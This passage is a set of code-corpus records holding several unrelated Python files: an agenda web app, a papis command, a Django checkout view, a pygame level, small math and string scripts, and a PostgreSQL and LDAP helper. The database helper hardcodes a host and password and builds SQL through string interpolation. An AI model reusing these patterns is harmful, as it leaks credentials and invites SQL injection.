agenda_id)\n \n \nclass AgendaAjaxHandler(webapp2.RequestHandler):\n def get(self, agenda_id):\n #does the same thing as AgendaHandler, but returns a JSON of template values\n # this is for AJAX style updating code\n if agenda_id is None:\n self.response.out.write('')\n return\n \n #retrieve the agenda, if it doesn't exist then make one\n q = Agenda.all()\n q.filter(\"identifier =\", agenda_id)\n agenda = q.get()\n if agenda is None:\n self.response.out.write('')\n return\n \n #check memcache for a response first\n json_response = memcache.get('$ajax-%s' % agenda_id)\n if json_response is not None:\n self.response.headers['Content-Type'] = 'text/plain'\n self.response.out.write(json_response)\n return\n \n #get the meeting references\n someday_meeting = agenda.someday_meeting\n upcoming_meeting = agenda.upcoming_meeting\n latest_meeting = agenda.latest_meeting\n \n #get the list of Todos for each meeting\n someday_todos_list = []\n for todo_key in someday_meeting.todos:\n todo = db.get(todo_key)\n if todo is None:\n 
continue\n \n todo_element = {\n \"key\": todo.key().id(),\n \"contents\": todo.contents,\n \"is_done\": todo.is_done\n }\n someday_todos_list.append(todo_element)\n \n latest_todos_list = []\n for todo_key in latest_meeting.todos:\n todo = db.get(todo_key)\n if todo is None:\n continue\n \n todo_element = {\n \"key\": todo.key().id(),\n \"contents\": todo.contents,\n \"is_done\": todo.is_done\n }\n latest_todos_list.append(todo_element)\n \n upcoming_todos_list = []\n for todo_key in upcoming_meeting.todos:\n todo = db.get(todo_key)\n if todo is None:\n continue\n \n todo_element = {\n \"key\": todo.key().id(),\n \"contents\": todo.contents,\n \"is_done\": todo.is_done\n }\n upcoming_todos_list.append(todo_element)\n \n #make the todos alphabetical\n someday_todos_list = sorted(someday_todos_list, key=lambda t: t[\"contents\"]) \n latest_todos_list = sorted(latest_todos_list, key=lambda t: t[\"contents\"])\n upcoming_todos_list = sorted(upcoming_todos_list, key=lambda t: t[\"contents\"]) \n \n #build the template\n template_values = {\n \"identifier\": agenda_id,\n \"name\": agenda.name,\n \"notes\": agenda.notes,\n \n \"time\": latest_meeting.start_time.strftime(\"%B %d, %Y\"),\n \n \"someday_key\": someday_meeting.key().id(),\n \"someday_name\": someday_meeting.name,\n \"someday_todos\": someday_todos_list,\n \n \"upcoming_key\": upcoming_meeting.key().id(),\n \"upcoming_name\": upcoming_meeting.name,\n \"upcoming_todos\": upcoming_todos_list,\n \n \"latest_key\": latest_meeting.key().id(),\n \"latest_name\": latest_meeting.name,\n \"latest_start\": int(time.mktime(latest_meeting.start_time.timetuple())) * 1000,\n \"latest_end\": int(time.mktime(latest_meeting.end_time.timetuple())) * 1000,\n \"latest_todos\": latest_todos_list\n }\n \n #render the response and cache it - just be sure to invalidate if changes\n json_response = json.dumps(template_values)\n memcache.add('$ajax-%s' % agenda_id, json_response, 60)\n \n self.response.headers['Content-Type'] = 'text/plain'\n self.response.out.write(json.dumps(template_values))\n \nclass MeetingHandler(webapp2.RequestHandler):\n def post(self):\n #provides metadata for an agenda like notes\n agenda_id = self.request.get('agenda_id', default_value=None)\n meeting_id = self.request.get('meeting_id', default_value=None)\n \n if meeting_id is None or agenda_id is None:\n self.error(500)\n return\n \n meeting = Meeting.get_by_id(int(meeting_id))\n if meeting is None:\n self.error(500)\n return\n \n name = self.request.get(\"name\", default_value=None)\n if (name is not None):\n meeting.name = name\n \n start_time = self.request.get(\"start_time\", default_value=None)\n if (start_time is not None):\n meeting.start_time = datetime.datetime.fromtimestamp(float(start_time))\n \n end_time = self.request.get(\"end_time\", default_value=None)\n if (end_time is not None):\n meeting.end_time = datetime.datetime.fromtimestamp(float(end_time))\n \n meeting.put()\n \n #invalidate the json memcache\n memcache.delete('$ajax-%s' % agenda_id)\n \n \nclass TodoHandler(webapp2.RequestHandler):\n def post(self):\n #modifies or deletes a todo\n #provides metadata for an agenda like notes\n agenda_id = self.request.get('agenda_id', default_value=None)\n todo_id = self.request.get('todo_id', default_value=None)\n logging.info(self.request.get(\"todo_id\"))\n if todo_id is None or agenda_id is None:\n self.error(500)\n return\n \n todo = Todo.get_by_id(int(todo_id))\n if todo is None:\n self.error(500)\n return\n \n should_delete = self.request.get(\"delete\", 
default_value=None)\n if should_delete is not None:\n todo.delete()\n return\n \n contents = self.request.get(\"contents\", default_value=None)\n if (contents is not None):\n todo.contents = contents\n \n is_done = self.request.get(\"is_done\", default_value=None)\n if (is_done is not None):\n todo.is_done = is_done == \"True\"\n \n is_done_switch = self.request.get(\"is_done_switch\", default_value=None)\n if (is_done_switch is not None):\n todo.is_done = not todo.is_done\n \n todo.put()\n \n #invalidate the json memcache\n memcache.delete('$ajax-%s' % agenda_id)\n \n \nclass NewTodoHandler(webapp2.RequestHandler):\n def post(self):\n #creates a new todo, marks it as done, or deletes an existing one\n # 'moving' a todo from meeting to meeting is really deleting and adding\n #provides metadata for an agenda like notes\n agenda_id = self.request.get('agenda_id', default_value=None)\n meeting_id = self.request.get('meeting_id', default_value=None)\n logging.info(meeting_id)\n if meeting_id is None or agenda_id is None:\n self.error(500)\n return\n \n meeting = Meeting.get_by_id(int(meeting_id))\n if meeting is None:\n self.error(500)\n return\n \n logging.info(meeting)\n \n contents = self.request.get(\"contents\", default_value=None)\n if (contents is None):\n self.error(500)\n return\n \n logging.info(contents)\n \n todo = Todo() \n todo.contents = contents\n \n is_done = self.request.get(\"is_done\", default_value=None)\n if (is_done is not None):\n todo.is_done = is_done == \"True\";\n \n todo.put()\n \n logging.info(todo)\n \n meeting.todos.append(todo.key())\n meeting.put()\n \n #invalidate the json memcache\n memcache.delete('$ajax-%s' % agenda_id)\n \n \n\nclass MainHandler(webapp2.RequestHandler):\n def get(self):\n #redirect to a new agenda\n rand_string = getNameHash()\n logging.error(rand_string)\n self.redirect('/'+rand_string)\n\napp = webapp2.WSGIApplication([\n ('/newtodo', NewTodoHandler),\n ('/todo', TodoHandler),\n ('/meeting', MeetingHandler),\n ('/AJAX/([a-zA-Z0-9_]*)', AgendaAjaxHandler),\n ('/([a-zA-Z0-9_]+)', AgendaHandler),\n ('/', MainHandler)\n], debug=True)\n","sub_path":"agenda-tool/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":16474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"341745115","text":"import papis\nimport os\nimport shutil\nimport papis.utils\nimport papis.bibtex\nimport papis.downloaders.utils\n\n\nclass Update(papis.commands.Command):\n def init(self):\n\n self.parser = self.get_subparsers().add_parser(\n \"update\",\n help=\"Update a document from a given library\"\n )\n\n self.parser.add_argument(\n \"--from-bibtex\",\n help=\"Update info from bibtex file\",\n action=\"store\"\n )\n\n self.parser.add_argument(\n \"-i\",\n \"--interactive\",\n help=\"Interactively update\",\n default=False,\n action=\"store_true\"\n )\n\n self.parser.add_argument(\n \"-f\",\n \"--force\",\n help=\"Force update, overwrite conflicting information\",\n default=False,\n action=\"store_true\"\n )\n\n self.parser.add_argument(\n \"-d\",\n \"--document\",\n help=\"Overwrite an existing document\",\n default=None,\n action=\"store\"\n )\n\n self.parser.add_argument(\n \"--from-url\",\n help=\"Get document or information from url\",\n default=None,\n action=\"store\"\n )\n\n self.parser.add_argument(\n \"document\",\n help=\"Document search\",\n nargs=\"?\",\n default=\".\",\n action=\"store\"\n )\n\n def main(self):\n documentsDir = os.path.expanduser(self.config[self.args.lib][\"dir\"])\n 
self.logger.debug(\"Using directory %s\" % documentsDir)\n documentSearch = self.args.document\n data = papis.bibtex.bibtex_to_dict(self.args.from_bibtex) \\\n if self.args.from_bibtex else dict()\n documents = papis.utils.get_documents_in_dir(\n documentsDir,\n documentSearch\n )\n document = self.pick(documents)\n if self.args.from_url:\n url_data = papis.downloaders.utils.get(self.args.from_url)\n data.update(url_data[\"data\"])\n document_paths = url_data[\"documents_paths\"]\n if not len(document_paths) == 0:\n document_path = document_paths[0]\n old_doc = self.pick(document[\"files\"])\n if not input(\"Really replace document %s? (Y/n): \" % old_doc) in [\"N\", \"n\"]:\n new_path = os.path.join(\n document.get_main_folder(), old_doc\n )\n self.logger.debug(\n \"Moving %s to %s\" %(document_path, new_path)\n )\n shutil.move(document_path, new_path)\n document.update(data, self.args.force, self.args.interactive)\n document.save()\n","sub_path":"papis/commands/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":2754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"171488293","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\n\nfrom .forms import CheckoutForm\nfrom .models import Address\nfrom cart.models import Order\nimport string\nimport random\n\n\ndef create_ref_code():\n return ''.join(random.choices(string.ascii_lowercase + string.digits, k=25))\n\ndef checkout_view(request):\n\n#---#POST\n if request.method == 'POST':\n form = CheckoutForm(request.POST or None)\n order = Order.objects.get(user= request.user, ordered=False)\n if form.is_valid():\n # useing degault billing address\n first_name = request.POST.get(\"first_name\")\n last_name = request.POST.get(\"last_name\")\n default_billing = request.POST.get('default_billing_address')\n ship_diffrent_address = request.POST.get('ship_diffrent_address')\n if default_billing:\n billing_address = Address.objects.filter(user=request.user,\n default_address=True,\n address_type='B').last()\n order.billing_address = billing_address\n if not ship_diffrent_address:\n order.shipping_address = billing_address\n order.code = create_ref_code()\n order.ordered = True\n order.in_way = True\n order.save()\n else:\n\n #new billing address\n billing_country = request.POST.get(\"billing_country\")\n address = request.POST.get(\"address\")\n zip_code = request.POST.get(\"zip_code\")\n phone_num = request.POST.get(\"phone_num\")\n\n new_billing_address = Address(\n user = request.user,\n first_name = first_name,\n last_name = last_name,\n country = billing_country,\n zip_code = zip_code,\n address = address,\n address_type = 'B',\n phone_num = phone_num,\n )\n new_billing_address.save()\n set_billing_default = request.POST.get(\"set_billing_address\")\n if set_billing_default:\n new_billing_address.default_address = True\n new_billing_address.save()\n order.billing_address = new_billing_address\n if not ship_diffrent_address:\n order.shipping_address = new_billing_address\n order.code = create_ref_code()\n order.ordered = True\n order.in_way = True\n order.save()\n\n # shipping address not billing address\n\n set_shipping_address = request.POST.get('set_shipping_address')\n default_shipping_address = request.POST.get('default_shipping_address')\n if ship_diffrent_address:\n first_name_s = request.POST.get(\"first_name_s\")\n last_name_s = 
request.POST.get(\"last_name_s\")\n #use default shipping address\n if default_shipping_address:\n shipping_address = Address.objects.filter(user=request.user,\n default_address=True,\n address_type='S').last()\n order.shipping_address = shipping_address\n order.code = create_ref_code()\n order.ordered = True\n order.in_way = True\n order.save()\n else:\n #new shipping address\n shipping_country = request.POST.get(\"shipping_country\")\n shipping_address = request.POST.get(\"shipping_address\")\n shipping_zip_code = request.POST.get(\"shipping_zip_code\")\n shipping_phone = request.POST.get(\"shipping_phone\")\n\n new_Shipping_address = Address(\n user = request.user,\n first_name = first_name_s,\n last_name = last_name_s,\n country = shipping_country,\n zip_code = shipping_zip_code,\n address = shipping_address,\n address_type = 'S',\n phone_num = shipping_phone,\n )\n new_Shipping_address.save()\n if set_shipping_address:\n new_shipping_address.default_address = True\n new_shipping_address.save()\n order.shipping_address = new_Shipping_address\n order.code = create_ref_code()\n order.ordered = True\n order.in_way = True\n order.save()\n\n messages.info(request, 'success')\n return redirect(\"/\")\n else:\n messages.info(request, 'sorry someyhing is wrong try again')\n return redirect(\"checkout:checkout\")\n\n\n#---# GET\n else:\n try:\n order = Order.objects.get(user= request.user, ordered=False)\n form = CheckoutForm()\n context = {'form':form,\n 'order':order\n }\n except:\n messages.info(request, 'sorry you dont have any active order')\n return redirect(\"products:list\")\n\n #get default billing\n last_default_billing_address = Address.objects.filter(user= request.user,\n address_type='B',\n default_address=True)\n if last_default_billing_address.exists():\n context.update({'default_billing_address':last_default_billing_address.last()})\n\n #get default shipping\n last_default_shipping_address = Address.objects.filter(user= request.user,\n address_type='S',\n default_address=True)\n if last_default_shipping_address.exists():\n context.update({'default_shipping_address':last_default_shipping_address.last()})\n\n\n template_name = 'checkout/checkout.html'\n\n return render(request, template_name, context)\n","sub_path":"src/checkout/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"495804567","text":"from ray_cast import *\r\nfrom enviroment_level_engine import *\r\nfrom sounds import *\r\n\r\nimport pygame\r\nfrom pygame.locals import *\r\n\r\nimport random\r\nimport sys\r\nimport math\r\nfrom pathlib import Path\r\n\r\n\r\ndef enviroment_level(screenX, display, Window_size, fs=False):\r\n pygame.mixer.pre_init(48000, -16, 2, 512)\r\n pygame.init()\r\n pygame.mixer.set_num_channels(16)\r\n\r\n clock = pygame.time.Clock()\r\n\r\n ss = Sounds()\r\n\r\n back_to_menu = False\r\n\r\n # !!!!!creating objects to control game\r\n loading = pygame.image.load(\"assets/textures/intro/loading.png\").convert()\r\n\r\n game = Game()\r\n game.fs = fs\r\n\r\n objects = Objects()\r\n\r\n objects.values[\"water\"] = 0\r\n objects.values[\"add_water\"] = False\r\n objects.values[\"dead\"] = False\r\n objects.values[\"tutorial_timer\"] = 0\r\n objects.values[\"won\"] = False\r\n\r\n ids = Id()\r\n\r\n # !!!!!creating player\r\n\r\n # never set direction to 0\r\n Player = Object(\"player\", game.custom_id_giver, [200, 200], [0, 0], 0.01, True, [8, 8])\r\n Player.move.collisions 
= True # enables collisions for player\r\n Player.move.speed = 8 # increasing speed so ur not super slow\r\n Player.move.angle_speed = Player.move.speed/160\r\n Player.move.offset = 30 # were creating 120 rays with 0.5 angle difference and we need player offset 30 angles\r\n # don't try to understand the comment above its just 30 it just is\r\n\r\n # simulating movement so u dont start at speed 0\r\n Player.dir_movement = Player.move.set_start_dir_movement(Player.direction, Player.dir_movement)\r\n\r\n # sorts player\r\n sort(Player, objects)\r\n # moves to next id\r\n game.custom_id_giver += 1\r\n\r\n # !!!!!creating rays\r\n\r\n rays = Rays(Player.direction, 200, display)\r\n\r\n # !!!!!creating map\r\n\r\n game_map = load_map(\"assets/maps/enviroment\")\r\n\r\n # !!!!! loading objects\r\n\r\n load_objects(game_map, 32, 32, objects, game)\r\n\r\n # !!!!! getting the dictionary for ray_casting\r\n # it contains textures for different blocks, numbers in map\r\n\r\n ray_dictionary = get_ray_dictionary()\r\n\r\n # timers for animations\r\n\r\n timer = Timers()\r\n timer.add_timer(40, True, \"ray_lava_animation\")\r\n\r\n # !!!!!game loop\r\n\r\n ss.sounds[\"Opener\"].play()\r\n while game.alive:\r\n # deleting objects\r\n\r\n game_map = objects.del_pos_in_map(game_map)\r\n objects.take_out_trash(ids)\r\n ids.remove_by_id(objects)\r\n\r\n # bg\r\n\r\n display.fill((0, 0, 0))\r\n\r\n # floor\r\n\r\n pygame.draw.rect(display, (186, 154, 88), (0, 330, 600, 120))\r\n pygame.draw.rect(display, (168, 136, 70), (0, 275, 600, 80))\r\n pygame.draw.rect(display, (145, 117, 60), (0, 245, 600, 30))\r\n pygame.draw.rect(display, (131, 106, 54), (0, 225, 600, 20))\r\n\r\n # celling\r\n\r\n pygame.draw.rect(display, (80, 80, 80), (0, -25, 600, 120))\r\n pygame.draw.rect(display, (60, 60, 60), (0, 95, 600, 80))\r\n pygame.draw.rect(display, (40, 40, 40), (0, 175, 600, 30))\r\n pygame.draw.rect(display, (20, 20, 20), (0, 205, 600, 20))\r\n\r\n # doing player movement\r\n\r\n Player.movement = Player.move.move(Player.dir_movement)\r\n Player.direction, Player.dir_movement = Player.move.change_dir(Player.direction, Player.dir_movement,\r\n Player.move.angle_speed)\r\n # second parameter is speed of rotation\r\n\r\n # adding additional conditions\r\n\r\n if objects.values[\"add_water\"]:\r\n objects.values[\"water\"] += 1\r\n ss.sounds[\"Item-pickup\"].play()\r\n objects.values[\"add_water\"] = False\r\n\r\n if objects.values[\"water\"] >= 20:\r\n for obj in objects.game_objects:\r\n if len(obj.memory) > 0:\r\n if obj.memory[0] == \"door\":\r\n hit_pos = [int(obj.object_pos[1] // 32), int(obj.object_pos[0] // 32)]\r\n objects.values[\"pos_to_del\"].append(hit_pos)\r\n objects.objects_to_delete.append(obj.object_id)\r\n ss.sounds[\"Door\"].play()\r\n\r\n # collisions\r\n\r\n objects.do_collisions(objects)\r\n\r\n # casting rays\r\n\r\n player_mid = [Player.object_pos[0] + (Player.size[0] / 2), Player.object_pos[1] + (Player.size[0] / 2)]\r\n rays.cast_rays(200, Player.direction, player_mid,\r\n game_map, Player.direction + (Player.move.offset * Player.move.degree), ray_dictionary)\r\n # for Player_mid argument we must give middle of player\r\n\r\n # running animations\r\n\r\n timer.add_time(ray_dictionary, objects)\r\n\r\n # event loop\r\n\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n\r\n # key_down\r\n\r\n if event.type == KEYDOWN:\r\n if event.key == K_ESCAPE:\r\n objects.values[\"dead\"] = True\r\n game.alive = False\r\n back_to_menu = True\r\n\r\n elif 
event.key == K_f:\r\n # remember fs = fullscreen\r\n game.fs = not game.fs\r\n if game.fs is False:\r\n screenX = pygame.display.set_mode(Window_size)\r\n else:\r\n screenX = pygame.display.set_mode(Window_size, pygame.FULLSCREEN)\r\n\r\n elif event.key == K_d:\r\n Player.move.right = True\r\n elif event.key == K_a:\r\n Player.move.left = True\r\n elif event.key == K_w:\r\n Player.move.forward = True\r\n elif event.key == K_s:\r\n Player.move.backwards = True\r\n\r\n # key_up\r\n\r\n elif event.type == KEYUP:\r\n if event.key == K_d:\r\n Player.move.right = False\r\n elif event.key == K_a:\r\n Player.move.left = False\r\n elif event.key == K_w:\r\n Player.move.forward = False\r\n elif event.key == K_s:\r\n Player.move.backwards = False\r\n\r\n # tutorial\r\n\r\n if objects.values[\"tutorial_timer\"] < 120:\r\n display.blit(pygame.image.load(\"assets/textures/intro/env0.png\"), [0, 0])\r\n elif objects.values[\"tutorial_timer\"] < 240:\r\n display.blit(pygame.image.load(\"assets/textures/intro/env1.png\"), [0, 0])\r\n elif objects.values[\"tutorial_timer\"] < 280:\r\n display.blit(pygame.image.load(\"assets/textures/intro/fullscreen_tutorial.png\"), [0, 0])\r\n\r\n objects.values[\"tutorial_timer\"] += 1\r\n\r\n # checking if dead or won\r\n\r\n if objects.values[\"dead\"]:\r\n display.blit(loading, [0, 0])\r\n screenX.blit(pygame.transform.scale(display, Window_size), (0, 0))\r\n pygame.display.update()\r\n game.alive = False\r\n\r\n if objects.values[\"won\"]:\r\n display.blit(loading, [0, 0])\r\n screenX.blit(pygame.transform.scale(display, Window_size), (0, 0))\r\n pygame.display.update()\r\n game.alive = False\r\n file = open(\"assets/save.txt\", \"w\")\r\n file.write(\"space_station\")\r\n file.close()\r\n\r\n # basic loop config\r\n\r\n screenX.blit(pygame.transform.scale(display, Window_size), (0, 0))\r\n pygame.display.update()\r\n clock.tick(40)\r\n\r\n if back_to_menu:\r\n return False, fs\r\n return True, fs\r\n","sub_path":"enviroment_level.py","file_name":"enviroment_level.py","file_ext":"py","file_size_in_byte":7522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"15527657","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport matplotlib\nmatplotlib.use('pdf')\nimport matplotlib.pyplot as plt\nimport os\nnom_pdf = os.path.basename(__file__).replace('.py','.pdf')\n\ndef resul_sup(S,Y):\n n = len(S)\n X = [ 0 for i in range(n)]\n i = n-1\n while i >= 0:\n X[i] = Y[i][0]\n j = n-1\n while j > i:\n X[i] -= S[i][j]*X[j]\n j -= 1\n X[i] = X[i]/S[i][i]\n i -= 1\n return [ [v] for v in X]\n\ndef resul_inf(S,Y):\n n = len(S)\n X = [ 0 for i in range(n)]\n i = 0\n while i < n:\n X[i] = Y[i][0]\n j = 0\n while j < i:\n X[i] -= S[i][j]*X[j]\n j += 1\n X[i] = X[i]/S[i][i]\n i += 1\n return [ [v] for v in X]\n \ndef transpose(M):\n n = len(M)\n T = [[0 for i in range(n)] for j in range(n)]\n for i in range(n):\n for j in range(n):\n T[i][j] = M[j][i]\n return T\n \nS = [[2,2,3,4], [0,1,2,3],[0,0,1,2],[0,0,0,1]]\n#print(S, transpose(S))\n\nI = [[2,0,0,0], [2,1,0,0],[1,2,3,0],[0,0,0,2]]\nY = [[1],[2],[3],[4]]\n#X = resul_sup(S,Y)\nX = resul_inf(I,Y)\nX = np.array(X)\nS = np.array(S)\nI = np.array(I)\n#print(np.dot(I,X))\n\nZ = [0, 3, 7, 13, 21, 30, 40, 53, 66, 82, 99, 117, 138, 159]\nt = [ [1, 4*i , (4*i)**2] for i in range(14)]\nV = np.array(t)\ntV = np.transpose(V)\nY = np.dot(tV,Z)\nA = np.dot(tV,V)\nL = np.linalg.cholesky(A) #renvoie l\ntL = np.transpose(L)\nX1 = np.linalg.solve(L,Y)\nX = np.linalg.solve(tL,X1)\n\ndef f(t):\n 
return X[0] + X[1]*t + X[2]*t**2\n\nt = [4*i for i in range(14)]\nplt.plot(t, Z, 'bo')\nplt.plot(t, [f(4*i) for i in range(14)], 'r')\n\nplt.savefig(nom_pdf)\nplt.close()\n","sub_path":"Echolesky_1_fig.py","file_name":"Echolesky_1_fig.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"468589466","text":"# The pig latin translator\n\npig = \"ay\"\n\nword1 = input(\"Please enter your desired word:\")\n\nif len(word1) > 0 and word1.isalpha():\n word2 = word1[1]\n word3 = word1 + word2 + pig\n word3 = word3[1:len(word3)]\n print(word3)\n \nelse:\n print(\"The word you've entered is not valid. Please choose another one.\")\n \n \n","sub_path":"Single word pig latin translator/Single word pig latin translator.py","file_name":"Single word pig latin translator.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"633976343","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 25 16:34:24 2014\n\n@author: rob\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport psycopg2 as pg\nfrom os.path import abspath\n\ndef get_connection(user='enfoldreader', password='enfoldreader'):\n return pg.connect(host='128.40.150.11',\n database='enfolding',\n user=user,\n password=password)\n\ndef get_user_connection(user='enfolding'):\n pwd = raw_input('Password for user %s:' % user)\n return get_connection(user=user, password=pwd)\n\ndef df_from_sql(sql):\n \"\"\"\n Create a dataframe from the given SQL statement.\n \n The connection used is whatever is returned from\n `get_connection`\n \"\"\"\n conn = get_connection()\n df = pd.read_sql_query(sql, conn)\n conn.close()\n return df\n\ndef insert_df_to_database(df, tablename, dbcols=None):\n \"\"\"\n Write the DataFrame `df` to the Enfolding database.\n \n Parameters\n ----------\n df: pandas.core.frame.DataFrame\n The dataframe to write\n tablename: str\n The name (with schema prepended if necessary) of the table to write to\n dbcols: dict\n A dictionary whose keys are columns of the DataFrame `db` to write, and \n whose values are the names of the columns in the database to write\n each DataFrame column to.\n \"\"\"\n if dbcols is None:\n dbcols = {k:k for k in df} # iterate column names\n sql = \"INSERT INTO %s(%s) VALUES\\n\" % (tablename, ','.join(dbcols.keys()))\n sql += _build_values(df, dbcols)\n with get_user_connection('enfolding') as con:\n with con.cursor() as cur:\n cur.execute(sql)\n con.commit()\n\ndef update_df_to_database(df, tablename, \n indexcols, dbcols):\n \"\"\"\n Update `tablename` in the Enfolding database with the DataFrame `df`.\n \n Parameters\n ----------\n df: pandas.core.frame.DataFrame\n The dataframe to write\n tablename: str\n The name (with schema prepended if necessary) of the table to write to\n indexcols: dict\n A dictionary whose keys are the name(s) of the (Multi)Index levels\n and whose values are the equivalent columns in the database\n dbcols: dict\n A dictionary whose keys are columns of the DataFrame `db` to write, and \n whose values are the names of the columns in the database to write\n each DataFrame column to.\n \"\"\"\n sql = build_update(df=df, tablename=tablename,\n indexcols=indexcols, dbcols=dbcols)\n with get_user_connection('enfolding') as con:\n with con.cursor() as cur:\n cur.execute(sql)\n con.commit()\n \ndef build_update(df, tablename, indexcols, dbcols):\n all_cols = indexcols.copy()\n 
all_cols.update(dbcols)\n df = pd.DataFrame(df).reset_index()\n sql = 'update %s as to_update' % tablename\n set_sql = 'set %s' % ', '.join(['\"%s\" = other.\"%s\"' % (v, k) for k, v in dbcols.iteritems()])\n values_sql = _build_values(df, all_cols)\n as_sql = _build_as('other', all_cols)\n from_sql = \"from (values %s) %s\" % (values_sql, as_sql)\n where_sql = _build_update_where('to_update', 'other', indexcols)\n return '\\n'.join([sql, set_sql, from_sql, where_sql])\n\ndef _value_row(row, columns):\n \"\"\"\n Turn a DataFrame row into a string of the form (col1, col2...)\n with the values appropriately quoted\n \"\"\"\n return '(%s)' % ', '.join([type_sensitive_quoting(row[k]) % row[k] for k in columns])\n\ndef _build_values(df, columns):\n \"\"\"\n A comma separated list of `_value_row`s, one for each row of\n `df`\n \"\"\"\n return ',\\n'.join(df.apply(_value_row, columns=columns, axis=1))\n\ndef _build_as(tbl_name, columns):\n as_string = \",\".join('\"%s\"' % k for k in columns)\n return \"AS %s(%s)\" % (tbl_name, as_string)\n\ndef _build_update_where(update_tbl, values_tbl, columns):\n \"\"\"\n return a where statement for each entry in columns\n \"\"\"\n clauses = ['%s.\"%s\" = %s.\"%s\"' % (values_tbl, k, update_tbl, v) for k, v in columns.iteritems()]\n where = ' AND '.join(clauses)\n return \"WHERE %s;\" % where\n\ndef build_set(row, dbcols):\n set_ = \" SET \"\n for dbcol in dbcols:\n value = row[dbcol]\n append = type_sensitive_equals(value)\n set_ += append % (dbcols[dbcol], value) + \", \"\n return set_[:-2] # Remove the last comma\n \ndef build_where(row, indexcols):\n \"\"\"\n Make a SQL WHERE statement from the DataFrame row `row`.\n \"\"\"\n where = \" WHERE \"\n for indexcol in indexcols:\n v = row[indexcol]\n if pd.isnull(v):\n where += \"1 = 2 AND \" # One of the keys is null!\n else:\n append = type_sensitive_equals(v)\n where += append % (indexcols[indexcol], row[indexcol]) + \" AND \"\n return where[:-5] # Remove the last \" AND \"\n \ndef type_sensitive_equals(v):\n return '\"%s\" = ' + type_sensitive_quoting(v)\n\ndef type_sensitive_quoting(v):\n try:\n int_v = int(v)\n # v is coercible as a number\n if int(v) == float(v):\n return '%i'\n else:\n return '%f'\n except ValueError:\n try:\n if np.isnan(v):\n # v is null\n return 'NULL /*%s*/'\n except TypeError:\n # v is not a number and is not null:\n # $$ is an escape-hell free way to write strings\n # in Postgres\n return \"$string$%s$string$\"\n","sub_path":"database/sql.py","file_name":"sql.py","file_ext":"py","file_size_in_byte":5409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"391609183","text":"# -*- coding: utf-8 -*-\n\n#\n# Copyright (c) 2016-2021 Virtual Cable S.L.U.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without modification,\n# are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n# * Neither the name of Virtual Cable S.L.U. 
nor the names of its contributors\n# may be used to endorse or promote products derived from this software\n# without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n\"\"\"\n@author: Adolfo Gómez, dkmaster at dkmon dot com\n\"\"\"\nimport logging\nimport typing\nimport tempfile\nimport os.path\n\nimport ldap.filter\n\nfrom django.utils.translation import gettext as _\nfrom uds.core.util import tools\n\nlogger = logging.getLogger(__name__)\n\nLDAPResultType = typing.MutableMapping[str, typing.Any]\n\nfrom ldap import (\n SCOPE_BASE, # type: ignore\n SCOPE_SUBTREE, # type: ignore\n SCOPE_ONELEVEL, # type: ignore\n SCOPE_SUBORDINATE, # type: ignore\n)\n\n\nclass LDAPError(Exception):\n @staticmethod\n def reraise(e: typing.Any):\n _str = _('Connection error: ')\n if hasattr(e, 'message') and isinstance(e.message, dict):\n _str += '{}, {}'.format(e.message.get('info', ''), e.message.get('desc'))\n else:\n _str += '{}'.format(e)\n raise LDAPError(_str)\n\n\ndef escape(value: str):\n \"\"\"\n Escape filter chars for ldap search filter\n \"\"\"\n return ldap.filter.escape_filter_chars(value)\n\n\ndef connection(\n username: str,\n passwd: typing.Union[str, bytes],\n host: str,\n *,\n port: int = -1,\n ssl: bool = False,\n timeout: int = 3,\n debug: bool = False,\n verify_ssl: bool = False,\n certificate: typing.Optional[str] = None, # Content of the certificate, not the file itself\n) -> typing.Any:\n \"\"\"\n Tries to connect to ldap. 
